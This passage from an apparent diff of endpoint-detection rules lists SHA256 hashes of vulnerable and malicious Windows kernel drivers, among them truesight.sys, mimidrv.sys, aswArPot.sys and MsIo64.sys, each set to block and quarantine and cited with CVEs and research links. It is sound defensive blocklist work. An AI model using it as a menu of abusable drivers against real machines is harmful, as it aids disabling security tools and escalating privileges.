"type": "hash", + "value": "a90c426d7fd9e5f88f28af8dae29291b0e00f540ed4c9fcf87c4dc221a181d74", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f36c0339-2c88-5122-853f-972b8e1f0ee4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144581Z", + "creation_date": "2026-03-23T11:45:31.144583Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144588Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c9b96740ab510dc69fab798877b0c3e1cef1599c55eb290c4bc439997263c5f8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f380e67c-48ea-5862-b52c-5ffa314fa187", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470281Z", + "creation_date": "2026-03-23T11:45:30.470285Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470294Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e171be5cf5cc1f74ec346a1ab0dfaa38c16da6b4265eed710a3faabfc13b9d56", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f38517ca-86f3-5b0e-b45d-26b107cd1e84", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488205Z", + "creation_date": "2026-03-23T11:45:31.488207Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488212Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "19c539073d670babad2182d19b1f1109b33efece3c215616468ff9f3611619a9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f38ddd69-b2c6-54f4-8835-ff067d1b7805", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146248Z", + "creation_date": "2026-03-23T11:45:32.146251Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146259Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ea7440064405fb9d4bb63876905f14beb70b0b01d26a7ea9b9d25c00932c8cca", + "comment": "Malicious Kernel Driver (aka driver_b4f33ffe.sys) [https://www.loldrivers.io/drivers/51a44484-8bcc-4150-8b94-4a755cff0af8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f38e9dc3-712e-57e8-8138-2fd587cddb17", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613770Z", + "creation_date": "2026-03-23T11:45:29.613772Z", + "enabled": true, 
+ "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613777Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a", + "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f39fb600-8c5e-59c0-8f19-50e4565bd9ca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144651Z", + "creation_date": "2026-03-23T11:45:31.144654Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144660Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "79bef3d6fda11d3622c526f416b837b6c437eaede7466c0fdbe0bcebd9f13d14", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f3a20967-2145-5ec5-adec-9e70a6d1d664", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969836Z", + "creation_date": "2026-03-23T11:45:29.969838Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969843Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0bc755f3e24023d931c637b4c734ae3a4d50567c87fd025114e0520413721751", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f3a370b0-7d2d-56b7-8fe4-16dcfa108ad8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975587Z", + "creation_date": "2026-03-23T11:45:29.975589Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975594Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ab0925398f3fa69a67eacee2bbb7b34ac395bb309df7fc7a9a9b8103ef41ed7a", + "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f3a3f928-f683-549a-86fd-428e4c194264", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974748Z", + "creation_date": "2026-03-23T11:45:29.974750Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974756Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c264c3d71a57a5dff031d74bd2f6ef715eff603cc8078df123e862603e096be4", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f3a95707-1745-5a35-ad4a-df0142499e98", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146396Z", + "creation_date": "2026-03-23T11:45:32.146398Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146404Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0ffb4081fe867c98118e472538e8a3e6feac2a9d80b5ae2d4e2b621b344cd6d9", + "comment": "Malicious Kernel Driver (aka driver_0ffb4081.sys) [https://www.loldrivers.io/drivers/8081b0d0-e18e-474a-bdfa-8ff1956d90cb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f3af80c6-9688-5eb7-a0a0-9633faaeee90", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819464Z", + "creation_date": "2026-03-23T11:45:30.819466Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819471Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "848b150ffcf1301b26634a41f28deacb5ccdd3117d79b590d515ed49849b8891", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f3c21312-3d6c-58dd-a1e9-fca63aeb0916", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818108Z", + "creation_date": "2026-03-23T11:45:31.818112Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818120Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ae91be2d3f55e3012ed209cf55d180a263be25df9494710d2d2bcbdb3e970e26", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f3dcb130-f1d0-5ddf-9b80-023a9726a56b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479222Z", + "creation_date": "2026-03-23T11:45:30.479224Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479230Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "035b96ff8b85d312be0f9df6271714392a802ec8bab59ae8229812ddc67ced5a", + "comment": "Vulnerable Kernel Driver (aka directio32_legacy.sys) [https://www.loldrivers.io/drivers/7a0842ca-1a64-4ad1-9d66-25eb983d1742/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f3df6038-84ff-55a2-af8c-6edaabf4d318", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824487Z", + "creation_date": "2026-03-23T11:45:30.824490Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824497Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "56e55585c72d5e0d8418c5dff56054e130e3b34d8acc0320c79b78edce5ab410", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka 
truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f3e23a75-a2cd-5881-9b90-ad67f05af6ab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.484688Z", + "creation_date": "2026-03-23T11:45:31.484691Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.484702Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "96f6af3a7cb383be7c1271775fcf2c9eb517a37172c11caa629a05cc322308c3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f3f4ede9-6f95-5629-bac5-a661597b98a6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144503Z", + 
"creation_date": "2026-03-23T11:45:32.144505Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144511Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "75aa0f984fdc2d0e1db632b65fbec424a87a8c68a822fca1e503a269eba71f2d", + "comment": "Malicious Kernel Driver (aka driver_fdd16a94.sys) [https://www.loldrivers.io/drivers/da066835-f37c-40bf-86bb-d77ad45c7f30/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f3f7e3c4-767f-5263-8dcf-5fc30cf35559", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453490Z", + "creation_date": "2026-03-23T11:45:30.453493Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453502Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4b5ef4b48a5b23818e84e415c70bd7058f665cb7cba379d05da689e1cbe1148e", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f3f8530e-1443-57c2-a2ab-d19e50a9e518", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620917Z", + "creation_date": "2026-03-23T11:45:29.620919Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620925Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4045ae77859b1dbf13972451972eaaf6f3c97bea423e9e78f1c2f14330cd47ca", + "comment": "Phoenix Technologies Vulnerable Physmem drivers (aka Agent64.sys) [https://www.loldrivers.io/drivers/5943b267-64f3-40d4-8669-354f23dec122/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f3fde89d-b46d-5752-bb41-1da9f641aa53", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461155Z", + "creation_date": "2026-03-23T11:45:30.461158Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461166Z", + "rule_level": null, + "rule_level_override": null, + 
"rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1e94d4e6d903e98f60c240dc841dcace5f9e8bbb0802e6648a49ab80c23318cb", + "comment": "Vulnerable Kernel Driver (aka sfdrvx32.sys) [https://www.loldrivers.io/drivers/6c0c60f0-895d-428a-a8ae-e10390bceb12/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f406c5dc-72db-556c-a2e4-ca7c0f8ffecd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819934Z", + "creation_date": "2026-03-23T11:45:31.819937Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819946Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8db20ae3737c397c8fb079eaeace0f374e1602adc781a948f9172862cc01198e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f41d3378-6fa6-5041-bc0e-3bf5dffd099b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476177Z", + "creation_date": "2026-03-23T11:45:31.476181Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476192Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5b699cb45b365f537c2bc4fef0ac2837586c1fd3f0986835ad182183a5c39927", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f4262759-77f2-5d3d-a927-229f4a0272ac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614093Z", + "creation_date": "2026-03-23T11:45:29.614095Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614100Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c7d4943ddac34e1a38692c624d799e634ad4c4e3ae7e3bb2ae4cf0d8eb8985bc", + "comment": 
"MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f426f4a3-811d-5ff9-b345-cc7977d70f84", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814718Z", + "creation_date": "2026-03-23T11:45:31.814722Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814731Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ac1c07a4fb4f034b91dd52083113f06baf89e85eb95ff4e8594b402237b08ef5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f427d5dd-6230-518e-8519-c13d2f7694f5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614421Z", 
+ "creation_date": "2026-03-23T11:45:29.614423Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614428Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1e8b0c1966e566a523d652e00f7727d8b0663f1dfdce3b9a09b9adfaef48d8ee", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f43d360d-0b3b-57c8-bf5b-a3c99e42cc74", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 